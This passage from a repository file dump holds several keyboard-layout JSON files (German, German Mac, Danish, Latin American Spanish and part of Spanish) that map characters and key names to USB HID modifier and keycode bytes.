\"HOME\":\"00,00,4a\",\n \"PAGEUP\":\"00,00,4b\",\n \"DEL\":\"00,00,4c\",\n \"DELETE\":\"00,00,4c\",\n \"END\":\"00,00,4d\",\n \"PAGEDOWN\":\"00,00,4e\",\n \"RIGHT\":\"00,00,4f\",\n \"RIGHTARROW\":\"00,00,4f\",\n \"LEFT\":\"00,00,50\",\n \"LEFTARROW\":\"00,00,50\",\n \"DOWN\":\"00,00,51\",\n \"DOWNARROW\":\"00,00,51\",\n \"UP\":\"00,00,52\",\n \"UPARROW\":\"00,00,52\",\n \"APP\":\"00,00,65\",\n \"MENU\":\"00,00,65\",\n \"ALT-TAB\":\"00,00,71\",\n \"CONTROL\":\"01,00,00\",\n \"CTRL\":\"01,00,00\",\n \"SHIFT\":\"02,00,00\",\n \"A\":\"02,00,04\",\n \"B\":\"02,00,05\",\n \"C\":\"02,00,06\",\n \"D\":\"02,00,07\",\n \"E\":\"02,00,08\",\n \"F\":\"02,00,09\",\n \"G\":\"02,00,0a\",\n \"H\":\"02,00,0b\",\n \"I\":\"02,00,0c\",\n \"J\":\"02,00,0d\",\n \"K\":\"02,00,0e\",\n \"L\":\"02,00,0f\",\n \"M\":\"02,00,10\",\n \"N\":\"02,00,11\",\n \"O\":\"02,00,12\",\n \"P\":\"02,00,13\",\n \"Q\":\"02,00,14\",\n \"R\":\"02,00,15\",\n \"S\":\"02,00,16\",\n \"T\":\"02,00,17\",\n \"U\":\"02,00,18\",\n \"V\":\"02,00,19\",\n \"W\":\"02,00,1a\",\n \"X\":\"02,00,1b\",\n \"Z\":\"02,00,1c\",\n \"Y\":\"02,00,1d\",\n \"1\":\"02,00,1e\",\n \"2\":\"02,00,1f\",\n \"3\":\"02,00,20\",\n \"4\":\"02,00,21\",\n \"5\":\"02,00,22\",\n \"6\":\"02,00,23\",\n \"7\":\"02,00,24\",\n \"8\":\"02,00,25\",\n \"9\":\"02,00,26\",\n \"0\":\"02,00,27\",\n \"\\\\\":\"05,00,14\",\n \"%\":\"02,00,2d\",\n \"/\":\"02,00,2f\",\n \"(\":\"02,00,30\",\n \"'\":\"02,00,31\",\n \"\\\"\":\"02,00,33\",\n \"!\":\"02,00,34\",\n \"?\":\"02,00,36\",\n \":\":\"02,00,37\",\n \"_\":\"02,00,38\",\n \"|\":\"05,00,1a\",\n \"#\":\"05,00,1b\",\n \"&\":\"05,00,06\",\n \"@\":\"05,00,19\",\n \"$\":\"05,00,33\",\n \"*\":\"05,00,38\",\n \"{\":\"05,00,05\",\n \"}\":\"05,00,11\",\n \"[\":\"05,00,09\",\n \"]\":\"05,00,0a\",\n \"~\":\"05,00,1e\",\n \"^\":\"05,00,20\",\n \"<\":\"05,00,36\",\n \">\":\"05,00,37\",\n \"CTRL-SHIFT\":\"03,00,00\",\n \"ALT\":\"04,00,00\",\n \"ALT-SHIFT\":\"06,00,00\",\n \"COMMAND\":\"08,00,00\",\n \"GUI\":\"08,00,00\",\n \"WINDOWS\":\"08,00,00\",\n \"COMMAND-OPTION\":\"12,00,00\",\n \"COMMAND-CTRL-SHIFT\":\"12,00,00\",\n \"COMMAND-CTRL\":\"12,00,00\",\n \"COMMAND-OPTION-SHIFT'\":\"12,00,00\"\n}" }, { "path": "languages/de.json", "content": "{\n \"__comment\":\"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\":\" \",\n \"__comment\":\"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\":\" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\":\" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\":\" \",\n \"__comment\":\"Definition of these 3 bytes can be found\",\n \"__comment\":\" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\":\" of document Device Class Definition for HID Version 1.11\",\n \"__comment\":\" - byte 1: Modifier keys\",\n \"__comment\":\" - byte 2: Reserved\",\n \"__comment\":\" - byte 3: Keycode 1\",\n \"__comment\":\" \",\n \"__comment\":\"Both documents can be obtained from link here\",\n \"__comment\":\" http://www.usb.org/developers/hidpage/\",\n \"__comment\":\" \",\n \"__comment\":\"A = LeftShift + a, { = LeftShift + [\",\n \"__comment\":\" \",\n \"__comment\":\"German umlauts added by Simon Dankelmann\",\n \"a\":\"00,00,04\",\n \"b\":\"00,00,05\",\n \"c\":\"00,00,06\",\n \"d\":\"00,00,07\",\n \"e\":\"00,00,08\",\n \"f\":\"00,00,09\",\n \"g\":\"00,00,0a\",\n \"h\":\"00,00,0b\",\n \"i\":\"00,00,0c\",\n \"j\":\"00,00,0d\",\n \"k\":\"00,00,0e\",\n \"l\":\"00,00,0f\",\n \"m\":\"00,00,10\",\n \"n\":\"00,00,11\",\n \"o\":\"00,00,12\",\n \"p\":\"00,00,13\",\n \"q\":\"00,00,14\",\n \"r\":\"00,00,15\",\n \"s\":\"00,00,16\",\n \"t\":\"00,00,17\",\n \"u\":\"00,00,18\",\n \"v\":\"00,00,19\",\n \"w\":\"00,00,1a\",\n \"x\":\"00,00,1b\",\n \"z\":\"00,00,1c\",\n \"y\":\"00,00,1d\",\n \"1\":\"00,00,1e\",\n \"2\":\"00,00,1f\",\n \"3\":\"00,00,20\",\n \"4\":\"00,00,21\",\n \"5\":\"00,00,22\",\n \"6\":\"00,00,23\",\n \"7\":\"00,00,24\",\n \"8\":\"00,00,25\",\n \"9\":\"00,00,26\",\n \"0\":\"00,00,27\",\n \"ENTER\":\"00,00,28\",\n \"ESC\":\"00,00,29\",\n \"ESCAPE\":\"00,00,29\",\n \"TAB\":\"00,00,2b\",\n \" \":\"00,00,2c\",\n \"SPACE\":\"00,00,2c\",\n \"+\":\"00,00,30\",\n \"#\":\"00,00,31\",\n \"^\":\"00,00,35\",\n \",\":\"00,00,36\",\n \".\":\"00,00,37\",\n \"-\":\"00,00,38\",\n \"CAPSLOCK\":\"00,00,39\",\n \"F1\":\"00,00,3a\",\n \"F2\":\"00,00,3b\",\n \"F3\":\"00,00,3c\",\n \"F4\":\"00,00,3d\",\n \"F5\":\"00,00,3e\",\n \"F6\":\"00,00,3f\",\n \"F7\":\"00,00,40\",\n \"F8\":\"00,00,41\",\n \"F9\":\"00,00,42\",\n \"F10\":\"00,00,43\",\n \"F11\":\"00,00,44\",\n \"F12\":\"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\":\"00,00,47\",\n \"BREAK\":\"00,00,48\",\n \"PAUSE\":\"00,00,48\",\n \"INSERT\":\"00,00,49\",\n \"HOME\":\"00,00,4a\",\n \"PAGEUP\":\"00,00,4b\",\n \"DEL\":\"00,00,4c\",\n \"DELETE\":\"00,00,4c\",\n \"END\":\"00,00,4d\",\n \"PAGEDOWN\":\"00,00,4e\",\n \"RIGHT\":\"00,00,4f\",\n \"RIGHTARROW\":\"00,00,4f\",\n \"LEFT\":\"00,00,50\",\n \"LEFTARROW\":\"00,00,50\",\n \"DOWN\":\"00,00,51\",\n \"DOWNARROW\":\"00,00,51\",\n \"UP\":\"00,00,52\",\n \"UPARROW\":\"00,00,52\",\n \"NUMLOCK\":\"00,00,53\",\n \"<\":\"00,00,64\",\n \"APP\":\"00,00,65\",\n \"MENU\":\"00,00,65\",\n \"ALT-TAB\":\"00,00,71\",\n \"CONTROL\":\"01,00,00\",\n \"CTRL\":\"01,00,00\",\n \"SHIFT\":\"02,00,00\",\n \"A\":\"02,00,04\",\n \"B\":\"02,00,05\",\n \"C\":\"02,00,06\",\n \"D\":\"02,00,07\",\n \"E\":\"02,00,08\",\n \"F\":\"02,00,09\",\n \"G\":\"02,00,0a\",\n \"H\":\"02,00,0b\",\n \"I\":\"02,00,0c\",\n \"J\":\"02,00,0d\",\n \"K\":\"02,00,0e\",\n \"L\":\"02,00,0f\",\n \"M\":\"02,00,10\",\n \"N\":\"02,00,11\",\n \"O\":\"02,00,12\",\n \"P\":\"02,00,13\",\n \"Q\":\"02,00,14\",\n \"R\":\"02,00,15\",\n \"S\":\"02,00,16\",\n \"T\":\"02,00,17\",\n \"U\":\"02,00,18\",\n \"V\":\"02,00,19\",\n \"W\":\"02,00,1a\",\n \"X\":\"02,00,1b\",\n \"Z\":\"02,00,1c\",\n \"Y\":\"02,00,1d\",\n \"!\":\"02,00,1e\",\n \"\\\"\":\"02,00,1f\",\n \"$\":\"02,00,21\",\n \"%\":\"02,00,22\",\n \"&\":\"02,00,23\",\n \"/\":\"02,00,24\",\n \"(\":\"02,00,25\",\n \")\":\"02,00,26\",\n \"=\":\"02,00,27\",\n \"?\":\"02,00,2d\",\n \"`\":\"02,00,2e\",\n \"*\":\"02,00,30\",\n \"'\":\"02,00,31\",\n \";\":\"02,00,36\",\n \":\":\"02,00,37\",\n \"_\":\"02,00,38\",\n \">\":\"02,00,64\",\n \"CTRL-SHIFT\":\"03,00,00\",\n \"ALT\":\"04,00,00\",\n \"CTRL-ALT\":\"05,00,00\",\n \"ALT-SHIFT\":\"06,00,00\",\n \"COMMAND\":\"08,00,00\",\n \"GUI\":\"08,00,00\",\n \"WINDOWS\":\"08,00,00\",\n \"COMMAND-OPTION\":\"12,00,00\",\n \"@\":\"40,00,14\",\n \"{\":\"40,00,24\",\n \"[\":\"40,00,25\",\n \"]\":\"40,00,26\",\n \"}\":\"40,00,27\",\n \"\\\\\":\"40,00,2d\",\n \"~\":\"40,00,30\",\n \"|\":\"40,00,64\",\n \"COMMAND-CTRL-SHIFT\":\"40,00,64\",\n \"COMMAND-CTRL\":\"40,00,64\",\n \"COMMAND-OPTION-SHIFT'\":\"40,00,64\",\n \"ß\":\"00,00,2d\",\n \"€\":\"40,00,08\",\n \"§\":\"02,00,20\",\n \"ä\":\"00,00,34\",\n \"ö\":\"00,00,33\",\n \"ü\":\"00,00,2f\",\n \"Ä\":\"02,00,34\",\n \"Ö\":\"02,00,33\",\n \"Ü\":\"02,00,2f\"\n}\n" }, { "path": "languages/de_mac.json", "content": "{\n \"0\": \"00,00,27\",\n \"1\": \"00,00,1e\",\n \"2\": \"00,00,1f\",\n \"3\": \"00,00,20\",\n \"4\": \"00,00,21\",\n \"5\": \"00,00,22\",\n \"6\": \"00,00,23\",\n \"7\": \"00,00,24\",\n \"8\": \"00,00,25\",\n \"9\": \"00,00,26\",\n \"__comment\": \"A mac's default Germany keyboard layout\",\n \"a\": \"00,00,04\",\n \"b\": \"00,00,05\",\n \"c\": \"00,00,06\",\n \"d\": \"00,00,07\",\n \"e\": \"00,00,08\",\n \"f\": \"00,00,09\",\n \"g\": \"00,00,0a\",\n \"h\": \"00,00,0b\",\n \"i\": \"00,00,0c\",\n \"j\": \"00,00,0d\",\n \"k\": \"00,00,0e\",\n \"l\": \"00,00,0f\",\n \"m\": \"00,00,10\",\n \"n\": \"00,00,11\",\n \"o\": \"00,00,12\",\n \"p\": \"00,00,13\",\n \"q\": \"00,00,14\",\n \"r\": \"00,00,15\",\n \"s\": \"00,00,16\",\n \"t\": \"00,00,17\",\n \"u\": \"00,00,18\",\n \"v\": \"00,00,19\",\n \"w\": \"00,00,1a\",\n \"x\": \"00,00,1b\",\n \"z\": \"00,00,1c\",\n \"y\": \"00,00,1d\",\n \"ENTER\": \"00,00,28\",\n \"ESC\": \"00,00,29\",\n \"ESCAPE\": \"00,00,29\",\n \"TAB\": \"00,00,2b\",\n \" \": \"00,00,2c\",\n \"SPACE\": \"00,00,2c\",\n \"+\": \"00,00,30\",\n \"#\": \"00,00,31\",\n \"<\": \"00,00,35\",\n \",\": \"00,00,36\",\n \".\": \"00,00,37\",\n \"-\": \"00,00,38\",\n \"CAPSLOCK\": \"00,00,39\",\n \"F1\": \"00,00,3a\",\n \"F2\": \"00,00,3b\",\n \"F3\": \"00,00,3c\",\n \"F4\": \"00,00,3d\",\n \"F5\": \"00,00,3e\",\n \"F6\": \"00,00,3f\",\n \"F7\": \"00,00,40\",\n \"F8\": \"00,00,41\",\n \"F9\": \"00,00,42\",\n \"F10\": \"00,00,43\",\n \"F11\": \"00,00,44\",\n \"F12\": \"00,00,45\",\n \"PRINTSCREEN\": \"00,00,46\",\n \"SCROLLLOCK\": \"00,00,47\",\n \"BREAK\": \"00,00,48\",\n \"PAUSE\": \"00,00,48\",\n \"INSERT\": \"00,00,49\",\n \"HOME\": \"00,00,4a\",\n \"PAGEUP\": \"00,00,4b\",\n \"DEL\": \"00,00,4c\",\n \"DELETE\": \"00,00,4c\",\n \"END\": \"00,00,4d\",\n \"PAGEDOWN\": \"00,00,4e\",\n \"RIGHT\": \"00,00,4f\",\n \"RIGHTARROW\": \"00,00,4f\",\n \"LEFT\": \"00,00,50\",\n \"LEFTARROW\": \"00,00,50\",\n \"DOWN\": \"00,00,51\",\n \"DOWNARROW\": \"00,00,51\",\n \"UP\": \"00,00,52\",\n \"UPARROW\": \"00,00,52\",\n \"NUMLOCK\": \"00,00,53\",\n \"^\": \"00,00,64\",\n \"APP\": \"00,00,65\",\n \"MENU\": \"00,00,65\",\n \"ALT-TAB\": \"00,00,71\",\n \"CONTROL\": \"01,00,00\",\n \"CTRL\": \"01,00,00\",\n \"SHIFT\": \"02,00,00\",\n \"A\": \"02,00,04\",\n \"B\": \"02,00,05\",\n \"C\": \"02,00,06\",\n \"D\": \"02,00,07\",\n \"E\": \"02,00,08\",\n \"F\": \"02,00,09\",\n \"G\": \"02,00,0a\",\n \"H\": \"02,00,0b\",\n \"I\": \"02,00,0c\",\n \"J\": \"02,00,0d\",\n \"K\": \"02,00,0e\",\n \"L\": \"02,00,0f\",\n \"M\": \"02,00,10\",\n \"N\": \"02,00,11\",\n \"O\": \"02,00,12\",\n \"P\": \"02,00,13\",\n \"Q\": \"02,00,14\",\n \"R\": \"02,00,15\",\n \"S\": \"02,00,16\",\n \"T\": \"02,00,17\",\n \"U\": \"02,00,18\",\n \"V\": \"02,00,19\",\n \"W\": \"02,00,1a\",\n \"X\": \"02,00,1b\",\n \"Z\": \"02,00,1c\",\n \"Y\": \"02,00,1d\",\n \"!\": \"02,00,1e\",\n \"\\\"\": \"02,00,1f\",\n \"$\": \"02,00,21\",\n \"%\": \"02,00,22\",\n \"&\": \"02,00,23\",\n \"/\": \"02,00,24\",\n \"(\": \"02,00,25\",\n \")\": \"02,00,26\",\n \"=\": \"02,00,27\",\n \"?\": \"02,00,2d\",\n \"`\": \"02,00,2e\",\n \"*\": \"02,00,30\",\n \"'\": \"02,00,31\",\n \">\": \"02,00,35\",\n \";\": \"02,00,36\",\n \":\": \"02,00,37\",\n \"_\": \"02,00,38\",\n \"CTRL-SHIFT\": \"03,00,00\",\n \"ALT\": \"04,00,00\",\n \"CTRL-ALT\": \"05,00,00\",\n \"ALT-SHIFT\": \"06,00,00\",\n \"COMMAND\": \"08,00,00\",\n \"GUI\": \"08,00,00\",\n \"WINDOWS\": \"08,00,00\",\n \"COMMAND-OPTION\": \"12,00,00\",\n \"~\": \"40,00,11\",\n \"@\": \"40,00,0f\",\n \"[\": \"40,00,22\",\n \"]\": \"40,00,23\",\n \"\\\\\": \"42,00,24\",\n \"|\": \"40,00,24\",\n \"{\": \"40,00,25\",\n \"}\": \"40,00,26\",\n \"COMMAND-CTRL-SHIFT\": \"40,00,64\",\n \"COMMAND-CTRL\": \"40,00,64\",\n \"COMMAND-OPTION-SHIFT'\": \"40,00,64\",\n \"ß\": \"00,00,2d\",\n \"€\": \"40,00,08\",\n \"§\": \"02,00,20\",\n \"ä\": \"00,00,34\",\n \"ö\": \"00,00,33\",\n \"ü\": \"00,00,2f\",\n \"Ä\": \"02,00,34\",\n \"Ö\": \"02,00,33\",\n \"Ü\": \"02,00,2f\"\n}\n" }, { "path": "languages/dk.json", "content": "{\n \"__comment\":\"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\":\" \",\n \"__comment\":\"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\":\" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\":\" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\":\" \",\n \"__comment\":\"Definition of these 3 bytes can be found\",\n \"__comment\":\" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\":\" of document Device Class Definition for HID Version 1.11\",\n \"__comment\":\" - byte 1: Modifier keys\",\n \"__comment\":\" - byte 2: Reserved\",\n \"__comment\":\" - byte 3: Keycode 1\",\n \"__comment\":\" \",\n \"__comment\":\"Both documents can be obtained from link here\",\n \"__comment\":\" http://www.usb.org/developers/hidpage/\",\n \"__comment\":\" \",\n \"__comment\":\"A = LeftShift + a, { = LeftShift + [\",\n \"__comment\":\" \",\n \"a\":\"00,00,04\",\n \"b\":\"00,00,05\",\n \"c\":\"00,00,06\",\n \"d\":\"00,00,07\",\n \"e\":\"00,00,08\",\n \"f\":\"00,00,09\",\n \"g\":\"00,00,0a\",\n \"h\":\"00,00,0b\",\n \"i\":\"00,00,0c\",\n \"j\":\"00,00,0d\",\n \"k\":\"00,00,0e\",\n \"l\":\"00,00,0f\",\n \"m\":\"00,00,10\",\n \"n\":\"00,00,11\",\n \"o\":\"00,00,12\",\n \"p\":\"00,00,13\",\n \"q\":\"00,00,14\",\n \"r\":\"00,00,15\",\n \"s\":\"00,00,16\",\n \"t\":\"00,00,17\",\n \"u\":\"00,00,18\",\n \"v\":\"00,00,19\",\n \"w\":\"00,00,1a\",\n \"x\":\"00,00,1b\",\n \"y\":\"00,00,1c\",\n \"z\":\"00,00,1d\",\n \"1\":\"00,00,1e\",\n \"2\":\"00,00,1f\",\n \"3\":\"00,00,20\",\n \"4\":\"00,00,21\",\n \"5\":\"00,00,22\",\n \"6\":\"00,00,23\",\n \"7\":\"00,00,24\",\n \"8\":\"00,00,25\",\n \"9\":\"00,00,26\",\n \"0\":\"00,00,27\",\n \"ENTER\":\"00,00,28\",\n \"ESC\":\"00,00,29\",\n \"ESCAPE\":\"00,00,29\",\n \"TAB\":\"00,00,2b\",\n \" \":\"00,00,2c\",\n \"SPACE\":\"00,00,2c\",\n \"+\":\"00,00,2d\",\n \"'\":\"00,00,31\",\n \",\":\"00,00,36\",\n \".\":\"00,00,37\",\n \"-\":\"00,00,38\",\n \"CAPSLOCK\":\"00,00,39\",\n \"F1\":\"00,00,3a\",\n \"F2\":\"00,00,3b\",\n \"F3\":\"00,00,3c\",\n \"F4\":\"00,00,3d\",\n \"F5\":\"00,00,3e\",\n \"F6\":\"00,00,3f\",\n \"F7\":\"00,00,40\",\n \"F8\":\"00,00,41\",\n \"F9\":\"00,00,42\",\n \"F10\":\"00,00,43\",\n \"F11\":\"00,00,44\",\n \"F12\":\"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\":\"00,00,47\",\n \"BREAK\":\"00,00,48\",\n \"PAUSE\":\"00,00,48\",\n \"INSERT\":\"00,00,49\",\n \"HOME\":\"00,00,4a\",\n \"PAGEUP\":\"00,00,4b\",\n \"DEL\":\"00,00,4c\",\n \"DELETE\":\"00,00,4c\",\n \"END\":\"00,00,4d\",\n \"PAGEDOWN\":\"00,00,4e\",\n \"RIGHT\":\"00,00,4f\",\n \"RIGHTARROW\":\"00,00,4f\",\n \"LEFT\":\"00,00,50\",\n \"LEFTARROW\":\"00,00,50\",\n \"DOWN\":\"00,00,51\",\n \"DOWNARROW\":\"00,00,51\",\n \"UP\":\"00,00,52\",\n \"UPARROW\":\"00,00,52\",\n \"<\":\"00,00,64\",\n \"APP\":\"00,00,65\",\n \"MENU\":\"00,00,65\",\n \"ALT-TAB\":\"00,00,71\",\n \"CONTROL\":\"01,00,00\",\n \"CTRL\":\"01,00,00\",\n \"SHIFT\":\"02,00,00\",\n \"A\":\"02,00,04\",\n \"B\":\"02,00,05\",\n \"C\":\"02,00,06\",\n \"D\":\"02,00,07\",\n \"E\":\"02,00,08\",\n \"F\":\"02,00,09\",\n \"G\":\"02,00,0a\",\n \"H\":\"02,00,0b\",\n \"I\":\"02,00,0c\",\n \"J\":\"02,00,0d\",\n \"K\":\"02,00,0e\",\n \"L\":\"02,00,0f\",\n \"M\":\"02,00,10\",\n \"N\":\"02,00,11\",\n \"O\":\"02,00,12\",\n \"P\":\"02,00,13\",\n \"Q\":\"02,00,14\",\n \"R\":\"02,00,15\",\n \"S\":\"02,00,16\",\n \"T\":\"02,00,17\",\n \"U\":\"02,00,18\",\n \"V\":\"02,00,19\",\n \"W\":\"02,00,1a\",\n \"X\":\"02,00,1b\",\n \"Y\":\"02,00,1c\",\n \"Z\":\"02,00,1d\",\n \"!\":\"02,00,1e\",\n \"\\\"\":\"02,00,1f\",\n \"#\":\"02,00,20\",\n \"%\":\"02,00,22\",\n \"&\":\"02,00,23\",\n \"/\":\"02,00,24\",\n \"(\":\"02,00,25\",\n \")\":\"02,00,26\",\n \"=\":\"02,00,27\",\n \"?\":\"02,00,2d\",\n \"^\":\"02,00,30\",\n \"*\":\"02,00,31\",\n \";\":\"02,00,36\",\n \":\":\"02,00,37\",\n \"_\":\"02,00,38\",\n \">\":\"02,00,64\",\n \"CTRL-SHIFT\":\"03,00,00\",\n \"ALT\":\"04,00,00\",\n \"CTRL-ALT\":\"05,00,00\",\n \"ALT-SHIFT\":\"06,00,00\",\n \"COMMAND\":\"08,00,00\",\n \"GUI\":\"08,00,00\",\n \"WINDOWS\":\"08,00,00\",\n \"COMMAND-OPTION\":\"12,00,00\",\n \"@\":\"40,00,1f\",\n \"$\":\"40,00,21\",\n \"{\":\"40,00,24\",\n \"[\":\"40,00,25\",\n \"]\":\"40,00,26\",\n \"}\":\"40,00,27\",\n \"|\":\"40,00,2e\",\n \"~\":\"40,00,30\",\n \"\\\\\":\"40,00,64\",\n \"COMMAND-CTRL-SHIFT\":\"40,00,64\",\n \"COMMAND-CTRL\":\"40,00,64\",\n \"COMMAND-OPTION-SHIFT'\":\"40,00,64\"\n}\n" }, { "path": "languages/es-la.json", "content": "{\n \"__comment\":\"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\":\" \",\n \"__comment\":\"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\":\" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\":\" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\":\" \",\n \"__comment\":\"Definition of these 3 bytes can be found\",\n \"__comment\":\" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\":\" of document Device Class Definition for HID Version 1.11\",\n \"__comment\":\" - byte 1: Modifier keys\",\n \"__comment\":\" - byte 2: Reserved\",\n \"__comment\":\" - byte 3: Keycode 1\",\n \"__comment\":\" \",\n \"__comment\":\"Both documents can be obtained from link here\",\n \"__comment\":\" http://www.usb.org/developers/hidpage/\",\n \"__comment\":\" \",\n \"__comment\":\"A = LeftShift + a, { = LeftShift + [\",\n \"__comment\":\" \",\n \"a\":\"00,00,04\",\n \"b\":\"00,00,05\",\n \"c\":\"00,00,06\",\n \"d\":\"00,00,07\",\n \"e\":\"00,00,08\",\n \"f\":\"00,00,09\",\n \"g\":\"00,00,0a\",\n \"h\":\"00,00,0b\",\n \"i\":\"00,00,0c\",\n \"j\":\"00,00,0d\",\n \"k\":\"00,00,0e\",\n \"l\":\"00,00,0f\",\n \"m\":\"00,00,10\",\n \"n\":\"00,00,11\",\n \"o\":\"00,00,12\",\n \"p\":\"00,00,13\",\n \"q\":\"00,00,14\",\n \"r\":\"00,00,15\",\n \"s\":\"00,00,16\",\n \"t\":\"00,00,17\",\n \"u\":\"00,00,18\",\n \"v\":\"00,00,19\",\n \"w\":\"00,00,1a\",\n \"x\":\"00,00,1b\",\n \"y\":\"00,00,1c\",\n \"z\":\"00,00,1d\",\n \"1\":\"00,00,1e\",\n \"2\":\"00,00,1f\",\n \"3\":\"00,00,20\",\n \"4\":\"00,00,21\",\n \"5\":\"00,00,22\",\n \"6\":\"00,00,23\",\n \"7\":\"00,00,24\",\n \"8\":\"00,00,25\",\n \"9\":\"00,00,26\",\n \"0\":\"00,00,27\",\n \"ENTER\":\"00,00,28\",\n \"ESC\":\"00,00,29\",\n \"ESCAPE\":\"00,00,29\",\n \"TAB\":\"00,00,2b\",\n \" \":\"00,00,2c\",\n \"SPACE\":\"00,00,2c\",\n \"'\":\"00,00,2d\",\n \"¿\":\"00,00,2e\",\n \"´\":\"00,00,2f\",\n \"+\":\"00,00,30\",\n \"ñ\":\"00,00,31\",\n \"{\":\"00,00,33\",\n \"}\":\"00,00,34\",\n \"|\":\"00,00,35\",\n \",\":\"00,00,36\",\n \".\":\"00,00,37\",\n \"-\":\"00,00,38\",\n \"CAPSLOCK\":\"00,00,39\",\n \"F1\":\"00,00,3a\",\n \"F2\":\"00,00,3b\",\n \"F3\":\"00,00,3c\",\n \"F4\":\"00,00,3d\",\n \"F5\":\"00,00,3e\",\n \"F6\":\"00,00,3f\",\n \"F7\":\"00,00,40\",\n \"F8\":\"00,00,41\",\n \"F9\":\"00,00,42\",\n \"F10\":\"00,00,43\",\n \"F11\":\"00,00,44\",\n \"F12\":\"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\":\"00,00,47\",\n \"BREAK\":\"00,00,48\",\n \"PAUSE\":\"00,00,48\",\n \"INSERT\":\"00,00,49\",\n \"HOME\":\"00,00,4a\",\n \"PAGEUP\":\"00,00,4b\",\n \"DEL\":\"00,00,4c\",\n \"DELETE\":\"00,00,4c\",\n \"END\":\"00,00,4d\",\n \"PAGEDOWN\":\"00,00,4e\",\n \"RIGHT\":\"00,00,4f\",\n \"RIGHTARROW\":\"00,00,4f\",\n \"LEFT\":\"00,00,50\",\n \"LEFTARROW\":\"00,00,50\",\n \"DOWN\":\"00,00,51\",\n \"DOWNARROW\":\"00,00,51\",\n \"UP\":\"00,00,52\",\n \"UPARROW\":\"00,00,52\",\n\t \"<\":\"00,00,64\",\n \"APP\":\"00,00,65\",\n \"MENU\":\"00,00,65\",\n \"ALT-TAB\":\"00,00,71\",\n \"CONTROL\":\"01,00,00\",\n \"CTRL\":\"01,00,00\",\n \"SHIFT\":\"02,00,00\",\n \"A\":\"02,00,04\",\n \"B\":\"02,00,05\",\n \"C\":\"02,00,06\",\n \"D\":\"02,00,07\",\n \"E\":\"02,00,08\",\n \"F\":\"02,00,09\",\n \"G\":\"02,00,0a\",\n \"H\":\"02,00,0b\",\n \"I\":\"02,00,0c\",\n \"J\":\"02,00,0d\",\n \"K\":\"02,00,0e\",\n \"L\":\"02,00,0f\",\n \"M\":\"02,00,10\",\n \"N\":\"02,00,11\",\n \"O\":\"02,00,12\",\n \"P\":\"02,00,13\",\n \"Q\":\"02,00,14\",\n \"R\":\"02,00,15\",\n \"S\":\"02,00,16\",\n \"T\":\"02,00,17\",\n \"U\":\"02,00,18\",\n \"V\":\"02,00,19\",\n \"W\":\"02,00,1a\",\n \"X\":\"02,00,1b\",\n \"Y\":\"02,00,1c\",\n \"Z\":\"02,00,1d\",\n \"!\":\"02,00,1e\",\n \"\\\"\":\"02,00,1f\",\n \"#\":\"02,00,20\",\n \"$\":\"02,00,21\",\n \"%\":\"02,00,22\",\n \"&\":\"02,00,23\",\n \"/\":\"02,00,24\",\n \"(\":\"02,00,25\",\n \")\":\"02,00,26\",\n \"=\":\"02,00,27\",\n \"?\":\"02,00,2d\",\n \"¡\":\"02,00,2e\",\n \"¨\":\"02,00,2f\",\n \"*\":\"02,00,30\",\n \"Ñ\":\"02,00,31\",\n \"[\":\"02,00,33\",\n \"]\":\"02,00,34\",\n \"°\":\"02,00,35\",\n \";\":\"02,00,36\",\n \":\":\"02,00,37\",\n \"_\":\"02,00,38\",\n\t \">\":\"02,00,64\",\n\t \"\\\\\":\"04,00,2d\",\n\t \"~\":\"04,00,30\",\n\t \"^\":\"04,00,33\",\n\t \"`\":\"04,00,34\",\n\t \"¬\":\"04,00,35\",\n\t \"CTRL-SHIFT\":\"03,00,00\",\n \"ALT\":\"04,00,00\",\n \"CTRL-ALT\":\"05,00,00\",\n \"ALT-SHIFT\":\"06,00,00\",\n \"COMMAND\":\"08,00,00\",\n \"GUI\":\"08,00,00\",\n \"WINDOWS\":\"08,00,00\",\n \"COMMAND-OPTION\":\"12,00,00\",\n \"COMMAND-CTRL-SHIFT\":\"12,00,00\",\n \"COMMAND-CTRL\":\"12,00,00\",\n \"COMMAND-OPTION-SHIFT'\":\"12,00,00\"\n}\n" }, { "path": "languages/es.json", "content": "{\n \"__comment\":\"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\":\" \",\n \"__comment\":\"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\":\" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\":\" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\":\" \",\n \"__comment\":\"Definition of these 3 bytes can be found\",\n \"__comment\":\" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\":\" of document Device Class Definition for HID Version 1.11\",\n \"__comment\":\" - byte 1: Modifier keys\",\n \"__comment\":\" - byte 2: Reserved\",\n \"__comment\":\" - byte 3: Keycode 1\",\n \"__comment\":\" \",\n \"__comment\":\"Both documents can be obtained from link here\",\n \"__comment\":\" http://www.usb.org/developers/hidpage/\",\n \"__comment\":\" \",\n \"__comment\":\"A = LeftShift + a, { = LeftShift + [\",\n \"__comment\":\" \",\n \"a\":\"00,00,04\",\n \"b\":\"00,00,05\",\n \"c\":\"00,00,06\",\n \"d\":\"00,00,07\",\n \"e\":\"00,00,08\",\n \"f\":\"00,00,09\",\n \"g\":\"00,00,0a\",\n \"h\":\"00,00,0b\",\n \"i\":\"00,00,0c\",\n \"j\":\"00,00,0d\",\n \"k\":\"00,00,0e\",\n \"l\":\"00,00,0f\",\n \"m\":\"00,00,10\",\n \"n\":\"00,00,11\",\n \"o\":\"00,00,12\",\n \"p\":\"00,00,13\",\n \"q\":\"00,00,14\",\n \"r\":\"00,00,15\",\n 